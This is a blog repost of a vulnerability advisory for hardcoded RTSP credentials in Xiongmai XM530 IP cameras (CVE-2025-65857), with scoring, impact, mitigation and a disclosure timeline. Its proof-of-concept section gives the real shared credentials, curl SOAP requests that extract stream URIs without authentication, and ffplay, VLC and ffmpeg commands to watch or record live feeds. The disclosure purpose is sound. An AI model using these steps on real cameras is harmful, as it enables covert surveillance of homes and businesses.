Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 13
Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure

# CVE-2025-65857

**Xiongmai XM530 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure

# CVE-2025-65857

**Xiongmai XM530 IP Camera Hardcoded RTSP Credentials Exposure**

---

## Summary

The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams.

**CVE ID:** CVE-2025-65857
**Severity:** CRITICAL
**CVSS v3.1 Score:** 9.1
**CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H`

### CVSS Breakdown

* **Attack Vector (AV):** Network - Remotely exploitable
* **Attack Complexity (AC):** Low - Credentials hardcoded in all devices
* **Privileges Required (PR):** None - Accessible via CVE-2025-65856
* **User Interaction (UI):** None - Zero-click exploitation
* **Confidentiality:** High - Complete video stream access
* **Integrity:** None - Read-only credential exposure
* **Availability:** High - Potential DoS via stream exhaustion

---

## Affected Products

**Vendor:** Hangzhou Xiongmai Technology Co., Ltd.
**Product:** IP Camera XM530V200_X6-WEQ_8M
**Commercial Brand:** ANBIUX (and hundreds of OEM rebrands)
**Firmware:** V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 and likely all V5.00.R02.* versions
**Component:** ONVIF Media Service - GetStreamUri endpoint

**Device Context:**
Xiongmai is a major OEM supplier of IP cameras sold under hundreds of brand names globally. These cameras are widely deployed in residential, commercial, and industrial surveillance systems.

---

## Vulnerability Details

The `GetStreamUri` ONVIF endpoint returns RTSP URIs with hardcoded credentials embedded directly in the URL.

**Technical Details:**

1. **Hard-coded Credentials (CWE-798)**
* Username: `wphd`
* Password: `2MNswbQ5`
* Identical across all tested devices
* Do not change when admin password is modified

2. **Insufficiently Protected Credentials (CWE-522)**
* Credentials transmitted in plaintext over HTTP
* Embedded in URI format: `rtsp://[IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream`
* No encryption or obfuscation

3. **Combined with CVE-2025-65856:**
* GetStreamUri endpoint accessible without authentication
* Complete zero-click access to live video streams
* No authentication barriers whatsoever

---

## Impact

An unauthenticated remote attacker can:

* Obtain RTSP credentials via unauthenticated ONVIF request
* Access live video and audio streams directly
* Monitor surveillance feeds in real-time
* Perform mass surveillance (credentials work across all devices)
* Violate privacy of camera subjects

**Privacy Impact:**
* Critical violation of GDPR and privacy regulations
* Enables targeted surveillance and stalking
* Mass surveillance operations feasible
* No user notification of unauthorized access

**Real-world Scenarios:**
* Home surveillance cameras monitored by strangers
* Business security feeds accessible to competitors
* Residential privacy completely compromised

---

## Proof of Concept

**Step 1: Obtain Valid Profile Tokens (No Authentication Required)**

```bash
curl -X POST http://[CAMERA_IP]:8899/onvif/device_service \
-H "Content-Type: application/soap+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body xmlns:trt="http://www.onvif.org/ver10/media/wsdl">
<trt:GetProfiles/>
</s:Body>
</s:Envelope>'
```

**Response includes available profiles:**
- Token `000` - mainStream (3200x1800 H264)
- Token `001` - subStream (800x448 H264)
- Token `002` - snapStream (800x448 JPEG)

**Step 2: Extract RTSP URI with Hardcoded Credentials**

```bash
curl -X POST http://[CAMERA_IP]:8899/onvif/Media \
-H "Content-Type: application/soap+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body xmlns:trt="http://www.onvif.org/ver10/media/wsdl">
<trt:GetStreamUri>
<trt:StreamSetup>
<tt:Stream xmlns:tt="http://www.onvif.org/ver10/schema">RTP-Unicast</tt:Stream>
<tt:Transport xmlns:tt="http://www.onvif.org/ver10/schema">
<tt:Protocol>RTSP</tt:Protocol>
</tt:Transport>
</trt:StreamSetup>
<trt:ProfileToken>000</trt:ProfileToken>
</trt:GetStreamUri>
</s:Body>
</s:Envelope>'
```

**Response exposes hardcoded credentials:**
```xml
<tt:Uri>rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream</tt:Uri>
```

**Step 3: Access Video Stream Directly**

```bash
# Using ffplay
ffplay "rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream"

# Using VLC
vlc "rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream"

# Using ffmpeg (recording)
ffmpeg -i "rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream" -c copy output.mp4
```

**Result:** Complete access to live video stream with zero authentication in three simple steps.

---

## Mitigation

### For Users (Immediate):

* **Network Isolation:** Place cameras on isolated VLAN with no internet access
* **Firewall Rules:** Block all inbound connections to RTSP port 554
* **VPN-Only Access:** Never expose cameras directly to internet
* **Monitor RTSP Connections:** Log and alert on unexpected RTSP sessions
* **Consider Replacement:** Given vendor's security history, replacement strongly recommended

### For Vendor:

* Remove hardcoded credentials from RTSP URIs
* Implement RTSP Digest Authentication (RFC 2617)
* Use session tokens with expiration
* Generate unique credentials per device
* Implement rate limiting on RTSP connections

**No patch currently available.**

---


## Timeline

* **November 2025:** Vulnerability discovered during security assessment
* **December 16, 2025:** CVE-2025-65857 assigned by MITRE
* **December 17, 2025:** Vendor contact attempted via This email address is being protected from spambots. You need JavaScript enabled to view it. (email delivery failed - server misconfigured)
* **December 17, 2025:** Alternative contact attempted via This email address is being protected from spambots. You need JavaScript enabled to view it. (email delivery failed)
* **December 18, 2025:** Public disclosure

**Vendor Response:** No response received. Official security contact infrastructure non-functional.

---

## Credits

**Discovered by:** Luis Miranda Acebedo
**Location:** Vigo, Galicia, Spain
**Contact:** This email address is being protected from spambots. You need JavaScript enabled to view it.

---

## References

* **CVE:** https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-65857
* **Related:** CVE-2025-65856 (ONVIF Authentication Bypass)
* **CWE-798:** https://cwe.mitre.org/data/definitions/798.html
* **CWE-522:** https://cwe.mitre.org/data/definitions/522.html
* **RTSP RFC 2326:** https://tools.ietf.org/html/rfc2326
* **Similar CVE:** CVE-2018-6830 (Foscam - Similar RTSP credential exposure)
* **Vendor History:**
* CVE-2017-16725 (Directory traversal, unpatched)
* CVE-2018-10088 (Authentication bypass, unpatched)
* CVE-2018-17915, 17917, 17919 (XMEye P2P vulnerabilities)
* Mirai botnet contributor (2016)
* SEC Consult Advisory (2018): "Recommend discontinuing Xiongmai products"

This site is open source. [Improve this page](https://github.com/LuisMirandaAcebedo/CVE-2025-65857/edit/main/README.md).

Social Media Share